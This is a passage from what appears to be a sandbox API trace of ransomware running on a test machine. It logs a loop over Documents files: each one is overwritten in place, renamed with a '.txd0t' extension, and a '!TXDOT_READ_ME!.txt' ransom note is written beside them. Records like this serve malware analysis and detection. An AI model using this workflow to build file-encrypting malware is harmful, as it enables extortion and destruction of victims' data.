(pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx") returned="iTea.pptx" [0074.771] StrCpyW (in: psz1=0xeca1dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.771] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned 0 [0074.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x480 [0074.771] WriteFile (in: hFile=0x480, lpBuffer=0x37ff434*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x37ff434*, lpNumberOfBytesWritten=0x37ff430*=0x2, lpOverlapped=0x0) returned 1 [0074.772] FlushFileBuffers (hFile=0x480) returned 1 [0074.776] WriteFile (in: hFile=0x480, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff430*=0x7f0, lpOverlapped=0x0) returned 1 [0074.776] FlushFileBuffers (hFile=0x480) returned 1 [0074.778] CloseHandle (hObject=0x480) returned 1 [0074.778] GetProcessHeap () returned 0xe30000 [0074.778] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.778] CloseHandle (hObject=0x478) returned 1 [0074.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\itea.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\itea.pptx.txd0t")) returned 1 [0074.780] SetEvent (hEvent=0x3f8) returned 1 [0074.780] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.781] StrCpyW (in: psz1=0x37ff430, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" [0074.781] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t" [0074.781] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t") returned 0 [0074.781] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc", dwFileAttributes=0x80) returned 1 [0074.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\pojjjs_vt-kw.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0074.782] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=70104) returned 1 [0074.782] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.782] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.783] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeec28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.783] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x111d0, lpNumberOfBytesRead=0x37ff3f0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3f0*=0x111d0, lpOverlapped=0x0) returned 1 [0074.784] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.784] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x111d0, lpNumberOfBytesWritten=0x37ff3f4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3f4*=0x111d0, lpOverlapped=0x0) returned 1 [0074.784] FlushFileBuffers (hFile=0x478) returned 1 [0074.786] GetProcessHeap () returned 0xe30000 [0074.787] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x15c) returned 0xeca148 [0074.787] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" [0074.787] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc") returned="PoJjjS_vt-KW.doc" [0074.787] StrCpyW (in: psz1=0xeca1dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.787] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned 1 [0074.787] GetProcessHeap () returned 0xe30000 [0074.787] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.787] CloseHandle (hObject=0x478) returned 1 [0074.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\pojjjs_vt-kw.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\pojjjs_vt-kw.doc.txd0t")) returned 1 [0074.789] SetEvent (hEvent=0x3f8) returned 1 [0074.789] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.791] StrCpyW (in: psz1=0x37ff430, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" [0074.791] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t" [0074.791] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t") returned 0 [0074.791] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf", dwFileAttributes=0x80) returned 1 [0074.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\rczvquqnfrht.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0074.791] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=98996) returned 1 [0074.791] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.791] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.792] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffe7b4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.792] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x182b0, lpNumberOfBytesRead=0x37ff3f0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3f0*=0x182b0, lpOverlapped=0x0) returned 1 [0074.794] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffe7d50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.794] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x182b0, lpNumberOfBytesWritten=0x37ff3f4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3f4*=0x182b0, lpOverlapped=0x0) returned 1 [0074.795] FlushFileBuffers (hFile=0x478) returned 1 [0074.797] GetProcessHeap () returned 0xe30000 [0074.797] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x15c) returned 0xeca148 [0074.797] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" [0074.797] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf") returned="RcZvqUQNfrhT.rtf" [0074.797] StrCpyW (in: psz1=0xeca1dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.797] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned 1 [0074.797] GetProcessHeap () returned 0xe30000 [0074.797] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.797] CloseHandle (hObject=0x478) returned 1 [0074.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\rczvquqnfrht.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\rczvquqnfrht.rtf.txd0t")) returned 1 [0074.800] SetEvent (hEvent=0x3f8) returned 1 [0074.800] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.801] StrCpyW (in: psz1=0x37ff430, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" [0074.801] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t" [0074.801] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t") returned 0 [0074.801] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots", dwFileAttributes=0x80) returned 1 [0074.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\tpnskvgoa.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0074.801] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=81179) returned 1 [0074.801] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.801] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.803] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffec0e5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.803] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x13d10, lpNumberOfBytesRead=0x37ff3f0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3f0*=0x13d10, lpOverlapped=0x0) returned 1 [0074.804] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffec2f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.804] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x13d10, lpNumberOfBytesWritten=0x37ff3f4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3f4*=0x13d10, lpOverlapped=0x0) returned 1 [0074.805] FlushFileBuffers (hFile=0x478) returned 1 [0074.807] GetProcessHeap () returned 0xe30000 [0074.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x156) returned 0xeca148 [0074.807] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" [0074.807] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots") returned="tPNskvgoa.ots" [0074.807] StrCpyW (in: psz1=0xeca1dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.807] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned 1 [0074.807] GetProcessHeap () returned 0xe30000 [0074.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.807] CloseHandle (hObject=0x478) returned 1 [0074.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\tpnskvgoa.ots"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\tpnskvgoa.ots.txd0t")) returned 1 [0074.813] SetEvent (hEvent=0x3f8) returned 1 [0074.813] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.814] StrCpyW (in: psz1=0x37ff420, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" [0074.814] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t" [0074.814] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t") returned 0 [0074.814] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv", dwFileAttributes=0x80) returned 1 [0074.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\tyf1bo7xwtgabs uk76.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0074.815] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=52650) returned 1 [0074.815] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.815] WriteFile (in: hFile=0x478, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0074.816] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffff3056, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.816] ReadFile (in: hFile=0x478, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xcda0, lpNumberOfBytesRead=0x37ff3e0, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff3e0*=0xcda0, lpOverlapped=0x0) returned 1 [0074.817] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffff3260, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.817] WriteFile (in: hFile=0x478, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xcda0, lpNumberOfBytesWritten=0x37ff3e4, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff3e4*=0xcda0, lpOverlapped=0x0) returned 1 [0074.817] FlushFileBuffers (hFile=0x478) returned 1 [0074.820] GetProcessHeap () returned 0xe30000 [0074.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x16a) returned 0xeca148 [0074.820] StrCpyW (in: psz1=0xeca148, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" [0074.820] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv") returned="tYF1BO7xWTgAbs uk76.csv" [0074.820] StrCpyW (in: psz1=0xeca1dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.820] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned 1 [0074.820] GetProcessHeap () returned 0xe30000 [0074.820] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0074.820] CloseHandle (hObject=0x478) returned 1 [0074.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\tyf1bo7xwtgabs uk76.csv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\z5oif6_mr_ui\\_l78dh7wk y2tbjieu\\_hv0qcp0pks\\tyf1bo7xwtgabs uk76.csv.txd0t")) returned 1 [0074.823] SetEvent (hEvent=0x3f8) returned 1 [0074.823] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0074.836] StrCpyW (in: psz1=0x37ff420, 